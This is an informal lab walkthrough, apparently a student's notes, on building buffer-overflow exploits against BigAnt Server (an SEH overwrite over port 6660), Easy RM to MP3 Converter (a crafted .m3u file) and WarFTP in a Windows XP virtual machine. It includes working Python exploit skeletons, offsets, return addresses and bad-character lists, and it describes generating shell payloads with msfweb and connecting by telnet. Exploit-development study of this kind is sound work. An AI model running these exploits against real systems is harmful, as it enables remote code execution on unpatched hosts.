BigAnt Server : Buffer Overflow SEH aplication

- WinXp
- OllyDbg (Debugger)
- BigAnt Server (Target Aplication SEH)
- Fuzzer


1. Create Fuzzer

Port : 6660
Address : 192.168.56.102 (we get from Bigant Servet IP)

fuzzer will create "A" until 2500 string

run Bigant Server

be sure AntServ Runing, debug using OllyDbg

after attach AntServ, run fuzzer..and debug look at register ESI filed "AAAA.." but register EIP not overwrite.. but aplication Crash

this Aplication using SEH, we must klik menu View>SEH chain

buffer send cleary seen saved in SEH Chain.. ,to trasmit char into the EIP prse Shift + F9

after that,, Follow Dump..

 

 2. Baypass SEH
search POP POP RETN

View > executable Modules double klik VBAJET32.DLL

Klik Kanan > Search for > Squence of Commands

we find POP POP RETN

tu Offset Overwrite SEH,, create pattern 2500 byte.. and edit fuzzer

restart BigAnt Server and OllyDbg, pair Break pnoit, like fisrt Step..
run fuzzer,, and cehk SEH chain, pres F9 for bayy pass SEH, write and remember EIP ersgister Address..

EIP : 42326742

use Pattern_ offset..

 conclusion : we need buffer 966 byte to SEH Handler, edit fuzzer.

#!/usr/bin/python
import socket
target_addres="192.168.56.102"
target_port=6660
buffer="USV "
buffer+="\x90"*962
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x41\x41\x41\x41"
buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_addres, target_port))
sock.send(buffer)
sock.close()

3. Control CPU

look SEH : 0F9A196A

#!/usr/bin/python
import socket
target_addres="192.168.56.102"
target_port=6660

buffer="USV "
buffer+="\x90"*962
buffer+="\xCC\xCC\xCC\xCC"
buffer+="\x6A\x19\x9A\x0F" #SEH Overwrite buffer+="\x90"*(2504-len(buffer))
buffer+="\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_addres, target_port))
sock.send(buffer)
sock.close()
do like first step and pair break point,
and then
debug.. but we get memory 4 byte.. this not enought..


we want to search memory have long space

4.Shellcode

create payload,,

run fuzzer,
after run fazer check SEH Chain..

SEH handler not valid..
remove payload from fuzzer.. and run again.. before run restart BigAnt Server and ollydbg, check Seh Chain

SEH handler valid..

we must axecute payload line per line to find bad charackter

use Generatecodes
root@bt:/opt# perl generatecodes.pl 00,0a,0d
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0b\x0c\x0e\x0f\x10\x11"
"\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f"
"\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e"
"\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d"
"\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c"
"\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b"
"\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a"
"\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89"
"\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98"
"\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7"
"\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6"
"\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5"
"\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4"
"\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3"
"\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2"
"\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"

restrat BigAnt server and OllyDbg, pair breakpoint

firat line

second

thrind

finally, we get \x20 is bad caracter..
add on payload generator.. edit fuzzer using payload

restar OllyDBG and BigAnt server. pair breakpoint. run fuzzer

5. Check Bad charackter in Buffer

6. Payload Fix

0x00 0x0a 0x0d 0x40 0x20 0x25

edit fuzzer use payload

runn telnet

Bufer Overflow EasyRM to MP3 Converter

tools
- Winxp (operating sistem)
- EasyRM to mp3 Converter (Target)
- Ollydbg (debugger)
- Fuzzer
- wsf3Web (generate payload)

Run WinXp in virtualBox
istall EasyRM to Mp3 Converter


1. Create Fuzzer
~#nano easyRM.py

#!/opt/bin/python
filename="fuzzer.m3u"
buffer="\x41"*26100
out_file=open(filename,'w')
out_file.write(buffer)
out_file.close()


filename wil be create filename fuzzer.m3u
buffer="\x41"*26100 will create String A  until 26100 character

after that..
#python easyRM.py
its will excecute eassyRM.py and create fuzzer.m3u

download fuzzer.m3u using bwroser in winxp using IE,, before that run apache2

and test file fuzzer.m3u and look what will hapen

aright .. easyRM crased,..
and then debugg uding Ollydbg

register EIP filed by 414141
couse string A tu long until EIP stack filed

2. Change string "A" using pattern
#./pattern_create.rb 26100 > string.txt

check string.txt and copy to fuzzer.m3u

 after edit easyRM.py,, run and use new fuzzer.m3u to load in easyRM again.. cek what will happen

see.. we get EIP = 48306C48 and ESP = 2Hl3Hl4H, it willpatter offset..

3. Pattern Ofset

use pattern offset to fuzzer

 #!/opt/bin/python
filename="fuzzer.m3u"
buffer="\x90"*26070
buffer+="\xEF\xBE\xAD\xDE"
buffer+="\x90"*32
out_file=open(filename,'w')
out_file.write(buffer)
out_file.close()


oke.. after edit easyRM.py execute again and download new fuzzer.m3u to load using EasyRM, after load EasyRM will be crash, and then debug using Ollydbg

resgister EIP filed "DEADBEEF" it to test handle EIP register

3.Search JMP ESP

Run EasyRM and debug using Ollydbg
view> Execute modules>USER32

in main window search for>commad

JMP ESP : 7E429353
5. Set Payload

Generate :

payload

and execute agan python file

load new fuzzer.mu3 in easyRM
cek telnet....

Buffer Overflow WarFTP (Payload) Final

Run msfWeb

open browser.. http://127.0.0.1:55555/
menu payload > filter modules : win32

generate payload

this result

aplly in fuzzer file...
run fuzzer and telnet